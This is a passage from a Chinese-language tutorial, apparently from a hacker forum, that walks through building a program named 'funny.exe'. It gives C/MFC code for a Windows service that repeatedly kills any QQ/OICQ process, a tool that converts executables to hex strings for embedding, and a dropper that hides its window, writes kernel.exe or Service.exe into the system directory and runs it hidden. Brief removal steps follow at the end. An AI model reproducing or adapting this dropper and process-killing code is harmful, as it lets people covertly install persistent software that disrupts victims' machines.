}
//处理服务要求
void WINAPI Handler(DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_STOP:
ss.dwCurrentState =SERVICE_STOPPED;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_CONTINUE:
ss.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_PAUSE:
ss.dwCurrentState = SERVICE_PAUSED;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
SetServiceStatus (ssh,&ss);
}
//在进程列表中查找QQ程序并杀掉的线程函数
UINT KillQQ(LPVOID lParam)
{
while(1)
{
m_PEArray.RemoveAll();
HANDLE hProcessSnap=NULL;
PROCESSENTRY32 pe32;
hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe32.dwSize=sizeof(PROCESSENTRY32);
if(::Process32First(hProcessSnap,&pe32))
{
do
{
m_PEArray.Add(pe32);
}
while(::Process32Next(hProcessSnap,&pe32));
}
int i;
for(i=0;i<m_PEArray.GetSize();i++)
{
CString str;
str.Format("%s",m_PEArray.szExeFile);
if(str.Find("QQ")!=-1││str.Find("OICQ")!=-1││str.Find("qq")!=-1││str.Find("oicq")!=-1)
{
HANDLE hProcess;
DWORD ProcessID;
ProcessID=m_PEArray.th32ProcessID;
hProcess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProcessID);
::TerminateProcess(hProcess,99);
CloseHandle(hProcess);
}
}
Sleep(500);
}
return 0;
}
编译连接可以生成Service.exe程序.(后附整个工程)
现在我们已经得到了实现功能的两个程序,kernel.exe是在Win9X系统下实现功能的程序,Service.exe是Win2000/XP下实现功能的程序.现在就要将这两个文件转化成16进制代码.可以通过一个程序来实现,建立一个名为exe2hex的Win32 Console Application程序,程序代码如下:
#include <stdio.h>
#include <windows.h>
int main(int argc,char **argv)
{
HANDLE hFile;
DWORD dwSize,dwRead,dwIndex=0,i;
unsigned char *lpBuff=NULL;
__try
{
if(argc!=2)
{
printf("\nUsage: %s <File>",argv[0]);
__leave;
}
hFile=CreateFile(argv[1],GENERIC_READ,FILE_SHARE_READ,
NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_value)
{
printf("\nOpen file %s failed:%d",argv[1],GetLastError());
__leave;
}
dwSize=GetFileSize(hFile,NULL);
if(dwSize==INVALID_FILE_SIZE)
{
printf("\nGet file size failed:%d",GetLastError());
__leave;
}
lpBuff=(unsigned char *)malloc(dwSize);
if(!lpBuff)
{
printf("\nmalloc failed:%d",GetLastError());
__leave;
}
while(dwSize>dwIndex)
{
if(!ReadFile(hFile,&lpBuff[dwIndex],dwSize-dwIndex,&dwRead,NULL))
{
printf("\nRead file failed:%d",GetLastError());
__leave;
}
dwIndex+=dwRead;
}
for(i=0;i<dwSize;i++)
{
if((i%16)==0)
if(i==0)
printf("\"");
else
printf("\"\n\"");
printf("\\x%.2X",lpBuff);
}
printf("\"");
}//end of try
__finally
{
if(lpBuff) free(lpBuff);
CloseHandle(hFile);
}
return 0;
}
编译出可执行文件exe2hex.exe,执行exe2hex kernel.exe >kernel.txt将输出结果重定向到一个文本文件就得到了kernel.exe的16进制代码,同理可以得到Service.exe的16进制代码.
啊,写了这么多还真有点累了,不过还好总算要完成了,歇口气.最后我们来编写主程序funny.exe:
用AppWizard生成一个名为funny的对话框程序.定义两个全局字符数组用来保存kernel.exe和Service.exe
的16进制代码:char exebuff9x[]="kernel.exe的16进制代码" char exebuff2k[]="Service.exe的16进制代码".添加HideWindow(),IsWin9X(),CreateFileService9x(CString FileName),CreateFileService2k
(CString FileName),RunService(CString FileName)几个函数,其代码和实现的功能如下:
//隐藏主窗口
void CFunnyDlg::HideWindow()
{
DWORD Style = ::GetWindowLong(AfxGetMainWnd()->m_hWnd,GWL_EXSTYLE);
Style = WS_EX_TOOLWINDOW ;
::SetWindowLong(AfxGetMainWnd()->m_hWnd,GWL_EXSTYLE,Style);
::MoveWindow(AfxGetMainWnd()->m_hWnd,0,0,0,0,FALSE);
}
//获取操作系统版本信息
BOOL CFunnyDlg::IsWin9X()
{
DWORD dwVersion;
dwVersion=::GetVersion();
if (dwVersion >= 0x80000000) //Win9x
return TRUE;
else
return FALSE; //Win2K/WinXP
}
//如果系统是Win9x则在系统目录下创建kernel.exe
void CFunnyDlg::CreateFileService9x(CString FileName)
{
DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(exebuff9x);
HANDLE hFile=NULL;
LPTSTR lpSysPath=new char[MAX_PATH];
LPTSTR lpCurrentPath=new char[MAX_PATH];
::GetSystemDirectory(lpSysPath,MAX_PATH);
LPCTSTR lpsysfilename;
lpsysfilename=(LPCTSTR)lstrcat(lpSysPath,FileName);
hFile=::CreateFile(lpsysfilename,GENERIC_WRITE│GENERIC_
READ,FILE_SHARE_READ│FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_value)
return ;
while(dwSize>dwIndex)
{
if(!::WriteFile(hFile,&exebuff9x[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
return ;
dwIndex+=dwWrite;
}
CloseHandle(hFile);
return ;
}
//如果系统是Win2k/XP则在系统目录下创建Service.exe
void CFunnyDlg::CreateFileService2k(CString FileName)
{
DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(exebuff2k);
HANDLE hFile=NULL;
LPTSTR lpSysPath=new char[MAX_PATH];
LPTSTR lpCurrentPath=new char[MAX_PATH];
::GetSystemDirectory(lpSysPath,MAX_PATH);
LPCTSTR lpsysfilename;
lpsysfilename=(LPCTSTR)lstrcat(lpSysPath,FileName);
hFile=::CreateFile(lpsysfilename,GENERIC_WRITE│GENERIC_
READ,FILE_SHARE_READ│FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_value)
return ;
while(dwSize>dwIndex)
{
if(!::WriteFile(hFile,&exebuff2k[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
return ;
dwIndex+=dwWrite;
}
CloseHandle(hFile);
return ;
}
//运行创建的kernel.exe或者Service.exe
void CFunnyDlg::RunService(CString FileName)
{
LPTSTR lpSysPath=new char[MAX_PATH];
::GetSystemDirectory(lpSysPath,MAX_PATH);
LPCTSTR lpsysfilename;
lpsysfilename=(LPCTSTR)lstrcat(lpSysPath,FileName);
PROCESS_INFORMATION pi;
STARTUPINFO si;
memset(&si,0,sizeof(si));
si.cb=sizeof(si);
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW;
BOOL bRet=::CreateProcess(lpsysfilename,NULL,
NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,NULL,NULL,&si,&pi);
return ;
}
在对话框的初始化函数里面调用上面定义的函数,其主要代码如下:
BOOL CFunnyDlg::OnInitDialog()
{
CDialog::OnInitDialog();
......
......
HideWindow(); //隐藏对话框窗口
CString FileName="\\kernel.exe";
if(IsWin9X()) //判断操作系统类型
{
CreateFileService9x(FileName); //在系统目录下创建kernel.exe
RunService(FileName); //运行kernel.exe
}
else
{
FileName="\\Service.exe";
CreateFileService2k(FileName); //在系统目录下创建Service.exe文件
RunService(FileName); //运行Service.exe
}
AfxBeginThread(ThreadMessage,NULL,NULL); //执行线程函数ThreadMessage
return TRUE;
}
好了,funny程序也完成了,现在可以编译连接成可执行程序了,整个程序就算写完了,你可以测试一下了以上代码在Win98,Win2000,WinXp,VC++6.0环境下调试通过.(附整个工程文件).写了这么多快要累死了.如果有什么问题请来信Inetufo@thugx.com,欢迎指教J
解决方法:
WIN98:
系统目录下将生成kernel.exe文件,可以先将注册表项HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersions\Run下面的kernel子键删除.重起系统再删除系统目录下的kernel.exe文件
Win2K/XP:
运行服务控制管理器,停止掉Service服务,然后将系统目录下的Service.exe文件删除,要把服务从服务管理器中清除可以将HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services下面的Service键删除即可.
|